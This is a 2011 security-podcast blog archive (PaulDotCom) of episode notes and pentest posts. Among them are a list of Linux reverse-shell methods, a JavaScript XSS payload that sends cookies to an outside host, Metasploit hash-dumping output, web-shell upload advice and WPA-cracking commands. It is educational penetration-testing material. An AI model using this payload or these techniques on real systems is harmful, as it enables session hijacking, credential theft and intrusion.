Sorry for the late release... holiday and all. Here it is Episode 245 part 1 with our interview with A.P. Delchi as he tells us his epic tails from the world of security world. Sit back and enjoy.

Episode 245 Show Notes

Episode 245 part 1 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,Carlos Perez,Larry Pesce

Audio Feeds:

Here is another gem from LaNMaSteR53 as originally posted here.

There are many distributions of linux, and they all do things a little different regarding default security and built-in tool sets. Which means when engaging these different flavors during a pentest, what works against one linux target to get an interactive shell, may not work against another. Well, not to worry my friends, there are many techniques for spawning shells, specifically reverse shells, from linux, and one or more of these techniques is bound to be available no matter which distro you're looking at.

The scenario is this: You have the ability to run a simple command, or cause a user to run a simple command, on the target system. Whether it be via a Remote Command Execution vulnerability in a website, or some sort of php injected XSS which causes a privileged user to run commands on the target system. There are many instances of this scenario. Starting from the easiest and most common, here are some of the techniques which can be used to gain reverse shell on the target system.

#1. netcat:
Surprise!!! Nothing new here. Plain and simple. Fire up a listener on the attacker machine on a port which is reachable from the target and connect back to the listener with netcat. Looks like this.

...just kidding...

#2. netcat with GAPING_SECURITY_HOLE disabled:
This is a little trick that Ed Skoudis tweeted about in November of last year, but I haven't seen it widely publicized. It is based on the common technique used to build netcat relays. When the GAPING_SECURITY_HOLE is disabled, which means you don't have access to the '-e' option of netcat, most people pass on using netcat and move to something else. Well this just isn't necessary. Create a FIFO file system object and use it as a backpipe to relay standard output from commands piped from netcat to /bin/bash back into netcat. Sounds confusing right? The following image should clear things up.

#3. netcat without netcat:
I love "hacks" that use features of the operating system against itself. This is one of those "hacks". It takes the /dev/tcp socket programming feature and uses it to redirect /bin/bash to a remote system. It's not always available, but can be quite handy when it is.

#4. netcat without netcat or /dev/tcp:
/dev/tcp not available either? Just use telnet with technique #2.

#5. telnet-to-telnet:
I'm not sure why you'd use this technique, but it's an option, so here it is nonetheless. This is clearly the ugliest of the techniques. This technique uses two telnet sessions connected to remote listeners to pipe input from one telnet session to /bin/bash, and pipe the output to the second telnet session. Commands are entered into one the of the attackers listeners and feedback is received on the other.

#6. RCE shell:
On this one I'm cheating a little bit. This applies to Remote Command Execution vulnerabilities only. Rather than manually enter commands into a proxy or browser url, I wrote small python script which gives you the feel of a shell, without spawning anything in reverse from the target. You merely pass the script the vulnerable url with the injectable field replaced with the '<rce>' tag and it presents you with a clean interface for entering commands. In the background, the script is making the request to the web server, parsing the response, and presenting it to you.

#7. PHP reverse shell via interactive console:
The last technique makes use of the php interactive console. The attacker issues one command which moves to the /tmp directory (because it is typically world writable), uses wget to download a malicious php reverse_tcp backdoor (which the attacker hosts on a web server that he controls), and executes the backdoor via the interactive console.

I want to end this post by stating that I am not the originator of techniques #1, 2, 3, 5, or 7. The majority of these techniques were learned in Ed Skoudis' amazing Security 504 and 560 classes available through SANS. Technique #4 is something I've never seen but stumbled across as I was conducting the demos for this post, so I'll take credit. Obviously, anyone can do #6, and there are plugins for various automated web app testing software packages that do, but I built my script from the ground up and tailored it to preference. If you know of any additional methods that may be helpful to the pentesting community, please leave in the comments below. Without sharing, we all fail. Thanks, and enjoy!

PaulDotCom will be teaching Offensive Countermeasures at Black Hat July 30-31

Do you like stories? How about the old fashioned yarns of yore where the snide get their comeuppance?

We at PaulDotCom love tales, so tonight, A. P. Delchi dials in to tell us his epic tale of comeuppance as only those who have managed computer and security for *much* smarter folks can comprehend. Then, stick around for the jack of all trades and master of more than ordinary men can aspire to, Moxie Marlinspike. Moxie will give us an overview of all the sweet encrypted goodness going on at Whisper Systems, and maybe even share a story or two from his sailing days.

Therefore, we encourage you to put a video on for the kids, pour yourself your brand of muscle relaxant, and enjoy Episode 245 of PaulDotCom Security Weekly as it was intended - live, via the link below:

If only the server room walls could talk...

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 245 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and Mike Perez.

Please take a moment and read the following article on the current Bank of America breach:

And this..

There are two main points we need to take from this. First, the insider threat is real. It is also incredibly hard to detect and react to. We have been pushing for quite some time at PDC to move beyond simple IDS/IPS/AV tactics. This story only serves to re-enforce this view.

The second thing we need ponder is the fact that it took a year to notify the customers of the breach. Oh... and 10 million being stolen.

I hope that the upper management pool around the world is starting to realize that security is not a check-box exercise. It is not a matter of "yep, we have security." And, it is not a bunch of kids in the basement looking for computers to "p0wn." The threats are real, the money they can steal is real. There is not a "product" you can purchase that will protect you.

PaulDotCom will be teaching Offensive Countermeasures at Black Hat July 30-31

This past week at Takedowncon in Dallas (I just happened to be "there"), Dillon Beresford elected to pull his talk on cascading SCADA vulnerabilities, after some conversations with Siemens (the SCADA manufacturer with the vulnerabilities as indicated in this talk) and DHS, who apparently indicated to him the seriousness of the issue. I sense all sort of conspiracy here, even though I was literally standing next to Dillon discussing the mess with Jayson Street. I find it commendable that Dillon elected to pull the talk themselves, but is that the REAL story? Did Dillon really not understand the gravity of the situation?

Further, does this actually work? Think of it like this: he did not do the research in a vacuum, I am sure he had co-workers and others helping. Also, he was communicating with the vendor and DHS. So let’s assume there were more than 10 people who knew about the research. This is being very generous because any government bureaucracy will have a crap-ton of people in a number of meetings to make any decisions. The point I am trying to make is this: the reason to suppress this talk was most likely not to stop the information from getting "out-there" because it already was. The people who would be interested in this research most likely have the means and capabilities to get it.

No, I fear the real reason for suppressing this talk was to cover the "sterling" reputation of the vendor and DHS. And that is a frightening prospect. I do understand that these SCADA attacks can be dangerous. But in reality, any vulnerability leveraged in the right way can be dangerous.

Tin Foil Hat Guy, please show us the way...

But I am glad Dillon made the call. It was his to make. Maybe we need a vulnerability disclosure panel or webcast on PaulDotCom in the near future.

This post brought to you by the Illuminati, Larry, and John.

PaulDotCom will be teaching Offensive Countermeasures at Black Hat July 30-31

It came from the blog the recap. Then weekly security news the only way we know how to do it. Listen in as John Strand schools us on a Sponge Bob Square pants vulnerability that allows code execution.

Episode 244 Show Notes

Episode 244 part 2 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,Carlos Perez,Larry Pesce

Audio Feeds:

Please take a moment and read the following article:

Six rising threats from cybercriminals.

"PCs are now fairly well protected", he says, so some hackers have moved on to mobile devices. - Really, what networks have you been looking at? No doubt, it can be profitable to attack mobile phones, but let’s not lose sight of the ill-protected PCs, that are more powerful and ubiquitous enough to attack and make money. "Smart Grid" - Sure, attackers are after the "Smart Grid," but let’s look at motivations. Theft of service and service disruption are the primary attack vectors, and this doesn't translate into profits as well as a credit card or bank account. I believe that if someone can find a way to generate (pun intended) money off the smart grid, not save money or bribe people for power (which is unlikely to be a good stream of revenue) this will not be widespread.

Yes, there has to be money in it for criminals to be interested. Crack ain't cheap.

Social Networking - In a typical exploit, says Joffe, someone contacts you on a service like Facebook or LinkedIn, posing as a friend of a friend or a co-worker of someone you trust. - Yes, this will be common, and yes it will be used by attackers to steal information, as long as we go on trusting social networks and using them to store our information. "Cyberstalking" - If you are a victim, you should learn about offensive countermeasures, and plant traps for those stalking you. Who is stalking me? I know who they are, just look at my Metasploit console.

Further, I think we need to look at exactly what is meant by systems being fairly well protected. When it comes to remote exploits (or Server Side Exploits) sure, things are far better in the world of Windows today. But here is the trick, attackers do not "need" to use remote exploits as much as they once did. It is far easier to get a target to run a malicious application than find a remote exploit. Hence, the reason why malware creation and privilege escalation should be a focus of concern for any pentesting group.

This app looks totally legit.

The point is this: the world is moving on. Follow the money and follow the tactics of the bad guys. Bad guys have been bypassing AV with their malware for quite some time. You need to learn how to do that too. Bad guys have been focusing on Privilege Escalation attacks. You need to do that too.

No, systems are not fairly well protected. The attacks have moved on. You should too.

PaulDotCom will be teaching Offensive Countermeasures at Black Hat July 30-31

Cesar Cerrudo is this weeks interview concerning by passing windows protection mechanisms.

Episode 244 Show Notes

Episode 244 part 1 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,Carlos Perez,Larry Pesce

Audio Feeds:

Date and time change this week for our live recording - the fun shifts to Friday at 8PM EDT, but rest assured that there will be the same awesome technical content with the help of Cesar Cerrudo, CTO of IOActive, who will be giving us a brief overview of his recent presentation on Bypassing Windows Services Protections.

So pour yourself a beer, give the Intern control of your remote, and be sure not to miss Episode 244 Friday night!

You can follow along and watch the show live via the link below:

>

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 244 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and Mike Perez.

A couple of months ago I was asked by the NWN guys from the pentest team to help them automate dumping windows hashes depending on the role and privilege level, for them I wrote hashdump2 a Meterpreter Script to automate what back then was required. Mubix this week wrote a blog post on his experience and process for when dumping hashes on x64 systems, specially Windows 2008 R2 Domain Controllers. I re-wrote the hashdump2 script and added the logic that Mubix came up with plus added the ability to escalate privileges using the getsystem API call and reworked the logic of the script and ported the result to a post module both called smart_hashdump. The way the module and script works is as follows

• It first checks the Privilege Level and OS.
• It will check if the target is a Domain Controller.
• Based on this information it will prefer the reading of the registry to get the hashes if possible, if not possible it will inject in to the lsass process if possible. For Domain Controllers it will use the injection to lsass.
• If the target is a Windows 2008 server and the process is running with admin privileges it will attempt to get system privilege using getsystem, if it gets SYSTEM privilege do to the way the token privileges are set it can still not inject in to the lsass process so the code will migrate to a process already running as SYSTEM and then inject in to the lsass process.
• If the code detects that it is running on a Windows 7/Vista box with UAC disabled and it is running as local admin it will run getsystem and it will use the read registry method.
• On Windows 2003/2000/XP it will use getsystem and if successful it will use the read registry method.

Script:

meterpreter > run smart_hasdump -h
Meterpreter Script for automating the dumping of local accounts from
the SAM Database and if the targets host is a Domain Controller the
Domain Account Database using the proper technique depending on 
privilage level, OS and Role of host.
OPTIONS:
    -h        Help menu.
    -l <opt>  Log folder to save results, if none provided default log path will be used.
    -s <opt>  Try to get SYSTEM Privilege

Module:

msf exploit(handler) > use post/windows/gather/smart_hashdump 
msf post(smart_hashdump) > info
       Name: Windows Gather Local and Domain Controler Account Password Hashes
     Module: post/windows/gather/smart_hashdump
    Version: $Revision$
   Platform: Windows
       Arch: 
       Rank: Normal
Provided by:
  Carlos Perez <carlos_perez@darkoperator.com>
Description:
  This will dump local accounts from the SAM Database and if the 
  targets host is a Domain Controller the Domain Account Database 
  using the proper technique depending on privilage level, OS and Role 
  of host.
msf post(smart_hashdump) > show options 
Module options (post/windows/gather/smart_hashdump):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   GETSYSTEM  false            no        Attempt to get SYSTEM Privilege on the target host.
   SESSION                     yes       The session to run this module on.

Both use the same calls and print almost the same messages so lets use the post module since it is what most of the code is moving to, first lets run it on a Windows 2008 R2 DC:

meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against WIN2K8R2-01
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518200416_default_192.168.1.234_windows.hashes_483699.txt
[+]     This host is a Domain Controller!
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*] Migrating to process owned by SYSTEM
[*] Migrating to wininit.exe
[+] Successfully migrated to wininit.exe
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552:::
[+]     krbtgtB:502:aad3b435b51404eeaad3b435b51404ee:a6c94aa1141fd563d618b5f1dd0d86c2:::
[+]     testuser:1109:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     WIN2K8R2-01$?:1006:aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f:::

On a Windows 7 System with UAC Disabled as Administrator:

meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against WIN701
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201100_default_192.168.1.224_windows.hashes_711181.txt
[*] Dumping password hashes...
[-] On this version of Windows you need to be NT AUTHORITY\SYSTEM to dump the hashes
[-] Try setting GETSYSTEM to true.
meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against WIN701
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201122_default_192.168.1.224_windows.hashes_541308.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 35f17065cf29faf142844a684d502ba8...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     adminuser:1000:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::

on a Windows 7 System as Administrator with UAC:

meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against WIN-KVJG16GEMOJ
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201439_default_192.168.1.112_windows.hashes_452083.txt
[-] Insufficient privileges to dump hashes!

Sadly UAC does a good job at blocking dumping the hashes even as Administrator, it will even block getsystem.

on a Windows XP System:

meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against TEST-01BCDAF47C
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201750_default_192.168.1.113_windows.hashes_761609.txt
[*] Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
[+]     SUPPORT_388945a0":1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::
meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against TEST-01BCDAF47C
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201818_default_192.168.1.113_windows.hashes_177417.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 4503ffd18cd3ee70d443b159c8626842...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
[+]     SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::

On XP and Windows 2003 if you are an administrator you can dump hashes with no problem and getsystem will yield success.

To get a list of all the accounts and hashes from the main console:

msf exploit(handler) > db_creds 
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=WIN2K8R2-01$? pass=aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=testuser  pass=aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=krbtgtB pass=aad3b435b51404eeaad3b435b51404ee:a6c94aa1141fd563d618b5f1dd0d86c2 active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552 active=true
[*] Time: 2011-05-18 02:03:40 UTC Credential: host=192.168.1.224 port=445 proto=tcp sname=smb type=smb_hash user=adminuser pass=aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:03:40 UTC Credential: host=192.168.1.224 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=HelpAssistant pass=17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=SUPPORT_388945a0 pass=aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63 active=true
[*] Found 9 credentials

.

If you are going to use those hashes in PSEXEC and for cracking remember to filter the Guest, SUPPORT_* and HelpAssistant accounts since typically they are disabled. On the Domain Controller the account with the hostname$ is the Active Directory Recovery Account many time the same as the Domain Admin Account and it can not be used remotely.

I included the creation of a loot file with the hashes for 2 reasons

1. It saves the SID of the account so as to identify the accounts and be able to use those if needed.
2. Some times you do not have a Database attached or delete a workspace by accident.
   
   

Script Download

Module Download

There have been a number of people coming to me and asking what tool to use for testing web applications. The answer is easy. The tool is Burp Pro.

However, I think many people are missing the point. When dealing with a web application the true vulnerabilities are not the ones that are identified when scanning an application with a tool. Sure, there are tools will help you find things like XSS or SQLi, but what about some of the harder to spot vulnerabilities? Things line XSRF and logic errors are not things that can be easily identified with a tool but can be devastating when attacked.

So what I want to offer today is a sort of quick view of how to approach a web application when looking for those hard to find vulnerabilities.

First, let’s identify some tools to assist with testing for XSRF. Notice, I did not say tools that will test for XSRF.

http://hexsec.com/misc/monkeyfist

http://code.google.com/p/pinata-csrf-tool/

http://www.youtube.com/watch?v=EmmNn1FRYm4

I said these tools assist with testing for XSRF because it will required you to do a bit of research into the business logic flow of an application.

Speaking of business logic flow, it is also important to map out how an application is put together. Look at the different input fields through the lens of Burp. See where different fields (input and output) exist. When you have identified these different fields, start tampering with them and seeing how the application reacts.

I want to share a presentation with you that clearly identifies how to do a great web application assessment.

Go and spend some time looking over the presentation. See how little of it was related to XSS and SQLi? This is what we mean by testing business logic.

Another great business logic test is to see how the site reacts to different user agent strings. A great tool for this is ua-tester from Chris John Riley.

I also wanted to share something that many people know about, but many more do not. I am shocked at how many of my students do now know about Laudanum. If you have the ability to upload scripts, you need to upload Laudanum. You upload the correct script (i.e. shell.asp for asp servers .php for php servers, etc.) and then you browse to the file you have uploaded. If everything went correctly (and it will most of the time) you will have shell on the server.

Finally, try forced browsing. What you do is list out all of the pages that are available to an administrative user (i.e. user management pages) then log in as a standard user, then try to view the admin pages by force browsing to them. For many sites the only security they have keeping general users from these pages is the fact that the links to them have been removed.

Is this everything you need to know? Not even close. I just hope it gets you going down the right direction. Tools are great, but we are Penetration Testers. We need to do more.

Plus, simply running tools is boring....

You only found Cross Site Scripting?

PaulDotCom will be teaching Offensive Countermeasures at Black Hat July 30-31

Here is another great post from LanMaSteR 53.

Everyone knows what XSS is, right? Good, I'll spare you the definition. A common use for XSS is stealing cookies to hijack sessions and gain access to restricted web content. Cookie stealing is typically done by forcing a target's browser to issue some sort of GET request to a server controlled by the attacker which accepts the target's cookie as a parameter and processes it in some way. In most cases, when a cookie stealing XSS attack is successful, it generates a visual clue which can tip off the target. While it is too late at this point, stealth has been compromised, and could be the difference between the user keeping the session active, or clicking 'log out' and rendering your stolen cookie invalid.

Good ole' fashion cookie stealin'

About a year ago, I came up with a stealth technique for executing cookie stealing XSS attacks that I assumed was common knowledge. But after talking about the technique with several top web app security professionals, I realize that the technique may be more unique than I initially thought. Below is an example of the technique.


javascript:img=new Image();img.src="http://tools.lanmaster53.com/monster.php?cookie="+document.cookie;


For those that don't understand exactly what is going on here, basically, I'm using a dummy JavaScript image to launch a GET request. The first part of the script instantiates an image object, and the second part sets the source attribute of the image object. In this example, the source url is what you would use in any other cookie stealing attack. The key here is that once the source attribute is set, the browser fires off the request and stores the response in memory. I never use the instantiated image, the browser doesn't care, and the user is unaware that anything has happened. Stealth is maintained.


So you see, this is very sneaky and full of potential. Here, I use this technique in creating a web based keystroke logger.

PaulDotCom will be teaching Offensive Countermeasures at Black Hat July 30-31

Kingpin is the story of Max Vision from his teen years to when he got arrested and sentenced as the top carder in the underground and how he used his hacking skills from good to bad and his constant attempts to do the right thing and kept being pulled back to the world of a black hat. The book covers from his youthful pranks, his forays in to hacking and being one of the top white hats in the industry, while the industry was young and booming during the dot com era. Max made several bad decision do his temper and lack of control, in addition the intellectual addiction that hacking produces, the rush of euphoria that causes the act of one being pitted against another, the challenge of bypassing defenses and being a shadow undetected and powerful inside a system caused him to delve deeper on the wrong side of the law, not to mention the amount of money he was making and his believes that in some part he was doing good and only harming the big companies. He used that energy and passion to become the master of one of the most powerful carder forums out there. The book also covers the early history of the security industry its players, covering the small band of programmers and technologist that started many of the security companies that change the landscape. Max being one of the contributors to the beginnings of projects like Snort the Opens Source IDS and the sharing of knowledge that formed the beginnings of the industry. The book also covers the side of the law enforcement agencies and officers that participated in the cat and mouse game against the different crime organizations. It shows how law enforcement had to adapt to the ever-changing landscape of then Internet and how it changed the rules of the game. Also we see how the paths of many of the prominent figures involved in attacks intermingled in the small community of the carder underground, where many of those that where committing the crimes also at one time or another also worked with law enforcement as informants and helped in operations, voluntarily or under threat of jail. My favorite part is on the hacking techniques used by this brilliant people, how they adapted and hid form law enforcement and the mistakes made that lead to their discovery and arrest. One of the areas of interest is how some of the people involved targeted law enforcement with success to gain information of their operations against them. I do believe that nobody could have brought this story to life in this way than Poulsen did, in great part do to his history as a hacker, knowing what motivates and drives the mentality of one and his experiences as a man on the run from the law. His career as a journalist for wired magazine provided the skills for him to transmit in a way that it is easy to grasp all the technical concepts in the book, taking the reader from scene to scene as played by each of the different players of the story and bring each one of those stories together and showing how the are all intertwined together. 

Below is a great write-up from Cory Kennedy.

I just finished a Backtrack 5 install on my Samsung Galaxy S phone.  I will detail out the steps to get it running most Android phones.  While this method was ONLY testing on my Galaxy S (Vibrant) but should work with other devices.

 

README.winning!

I have split this guide into two sections.  The first section titled "Quick Version" is a simple set of steps to get this working on your phone.  All the work in the full version has already been completed by using the quick version.

The "Full Version" goes into process detail if you would like to perform all the steps or it may help if you get stuck at any time during the process.  This guide will continually be updated to include any feedback or changes.

Quick Version:

1. Download the complete set of files you need from here: http://l-lacker.com/bt5/BT5_ARM_Joined.zip Extract BT5.zip to your phones internal SDcard in a directory called "BT5" (cAsE sEnSiTiVe)


2. Launch terminal emulator from your phone and type (everything after the $: or #: is user input):
   $: su
   #: cd sdcard
   #: cd BT5
   #: sh bootbt


3. While Backtrack is loaded (when you see a red "root@localhost") start the VNC server by typing:root@localhost:~#: startvnc (stopvnc kills it)


4. Launch VNC (im using this)from your phone and point it at 127.0.0.1:5901 VNC pass: toortoor


5. Welcome to Backtrack on your Phone!

Full Version

1. Download a copy of Backtrack 5 for ARM from : http://www.backtrack-linux.org/downloads/ (Be nice and register)

Name:	BT5-GNOME-ARM.torrent
Size:	1060
Flavor:	GNOME
Arch:	arm
Image:	IMG
Download:	Torrent
MD5:	a66bf35409f4458ee7f35a77891951eb

Update!!!

Complete package files that you need to install on your phone can be found here: http://l-lacker.com/bt5/BT5_ARM_Joined.zip Instructions are included.

2. Extract and review the "README" file.

I have posted the readme file here for quick reference, and have just added my notes to during the process.     I urge you to read the official read me included with the release prior to reading the below with comments.  My notes are in bold.

I would HIGHLY recommend following busybox instructions for your specific rom.   Most of the time this means updating to the latest version, but that is not always the case.

The Vibrant comes with 16gig NON removable internal storage.  The phone mounts this as the "sdcard" and the external SD card is removable.  I will be using the internal mass storage device to install BT5.

Without wasting more time, onto the readme.

BackTrack 5 ARM Edition Quick Start
This image has been developed and tested on the Motorola Xoom.
Your mileage may vary on other devices. As this image runs in a chroot, you will need to have your device rooted. There are numerous tutorials on the subject online and are not included here.

***Rooting your device will potentially void its warranty and we are not in any way resposible if  you brick your device while rooting it.***

### IMPORTANT POINTS ###
1. Since the image runs in a chroot, there is no root password set.

2. There are 2 scripts under /usr/bin/ 'startvnc' and 'stopvnc' that are set to start with the Xoom's default resolution.

Once Backtrack5 is running off your phones internal storage you will need to edit the scripts to match your phone or devices resolution.  In my case, the Vibrant uses 480x800.   Details on this step later in the instructions.

3. The current vnc password is set to 'toortoor' and can be changed by running 'vncpasswd'

4. This image is a work in progress and suggestions/tips from the community are always welcome.

### GETTING STARTED ###

ADB is a  veristile tool when it comes to Android development and interacting with the device and while the below WILL indeed work, and is independent of any OS (assuming you have the Android SDK installed).  I felt it was overkill for this task and simply mounted my SDcard and moved the files through OSX finder.  I also made changes via another machine using Windows explorer.  Again, choose your comfort level, steps 1-5 are simply a means to an end. That end is getting the files onto your SDcard.

1. Once you have downloaded the ARM BT package, save the files in a convenient location. The steps below assume they are in the platform-tools folder of the Android SDK.

2. Go to your platform-tools directory and proceed to make a directory on the device to store BT5: ./adb shell mkdir /sdcard/BT5 exit

3. Copy over the busybox install files: ./adb push busybox /sdcard/ ./adb push installbusybox.sh /sdcard

4. Install busybox on the device: ./adb shell cd /sdcard/ sh installbusybox.sh exit

5. Transfer the required BT5 files to the device: ./adb push fsrw /sdcard/BT5/ ./adb push mountonly /sdcard/BT5/ ./adb push bootbt /sdcard/BT5/ ./adb push bt5.img.gz /sdcard/BT5/ ./adb push unionfs /sdcard/BT5/

6. Uncompress the image and start BT5: ./adb shell su cd /sdcard/BT5 gunzip bt5.img.gz sh bootbt

My internal SDcard is formated as FAT32 and this file system is "required" for the phone to interact with the contents on the sd card.  I have tried formating the internal card with EXT3, EXT4, exFAT and was greeted each time with a "Damaged SD card" message.
Because of this the installation stops when trying to extract the official bt5.img file from the ARM package as it ends up being >5 gigs.  Since there is a 4 gig file limitation on the FAT32  filesystem, we should just give up. Right?

Nope, Lets Try Harder.

I have tried splitting  the bt5.img and resembling on the device which obviously failed.  There is only one thing left to do....

Modify the bt5.img file to fit into 4 gigs.  What can we remove?

1. Looks like someone over at XDA had the same idea. Therefore,  I am going to revisit this section at a later day on how to manually create the image file.  I started the process, but decided in my end goal for this post was to have a working Backtrack 5 install on my Vibrant.


2. Since the heavy lifting is done, It's time to grab the files (or contact me for a mirror) , join them together and place this file into the BT5 directory of our sdcard.
   To join the 3 files from the XDA post together, simply put them all in the same directory and use the cat command to join them: "cat bt.7z.* > bt.7z "


3. Extract the joined bt.7z file


4. Rename bt.img to bt5.img and grab on that file and move it to your sd cards's BT5 directory.

This is what you should end up with in your phones BT5 directory.

Starting BackTrack 5

Once all the files have been transfered, test the installation by trying to start Backtrack from terminal emulator.

Success!

If all goes well, you'll be in the BT5 chroot:# sh bootbtnet.ipv4.ip_forward = 1root@localhost:/

# ls /pentest/backdoors  database   exploits   passwords  scanners stressing  voipcisco  enumeration  forensics  python     sniffers  tunneling  webroot@localhost:/#

3. ???? (or is this one profit?)

4. VNC

Here is the fun part, sure the shell is pretty to look at however I want a gui to interact with.

Note: Prior to starting the VNC server, you MUST perform this step to alter the screen resolution to match your device by modifying the /usr/bin/startvnc file.

If you do not alter the geometry you may encounter the error below.

I modified /usr/bin/startvnc by starting an SSH daemon on my phone and doing the work from a computer.

1. Start the VNC server running on the BT5 phone install.

2. Check the VNC log! BT5 is listening on 5901. Then click connect.

3. Welcome to Backtrack 5!

At the beginning of April  I tweeted: "Wouldn't this just bring tears to your eyes if it was true? #metasploitonandroid http://twitpic.com/4hfqgz " , and now its true. <tear>

Huge thanks to the backtrack team for providing an Android version of  Backtrack.  Great work!

Special thanks to : anantshri at XDA for the advice and doing the hard work of creating the image files so quickly.  Be sure to check out his other work.

PaulDotCom will be teaching Offensive Countermeasures at Black Hat July 30-31

Marcia Hofmann from the EFF drops by to get all legal on us in the event your devices are confiscated. Some good advice if you are traveling with devices that contain data that would rather not get seen. Then join us for drunken news of the week.

Drunken security news style:

Episode 243 Show Notes

Episode 243 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,Carlos Perez,Larry Pesce

Audio Feeds:

It is interesting how many people believe that their wireless is secure because they are using WPA. Well we did a test recently and were able to basically password guess our way with a dictionary attack using either a straight dictionary or a rainbow table. The cool thing is I bought an ALFA usb antenna and could sit down at the corner coffee place and still see my wireless access point.

Security people: Be sure that your WPA password is an unreadable string not something found in a dictionary, and not a phrase that you can read like op3nth3p0dbayd00rs the tables of today are too intelligent for that.

In a nutshell using linux this is how it is done:

Part I

airmon-ng start wlan0 (this puts the wireless car in promiscuous mode)

kismet -c wlan0

•close console window to see collection of packets
•use alt + k to get to top pull down menu's, turn on ability to see type of access points bsid and guess at IP address, channel #
Cntrl-C to exit kismet

airmon-ng stop wlan0

Part II

airmon-ng start wlan0

airodump-ng -c -bssid -w wlan0

Example:

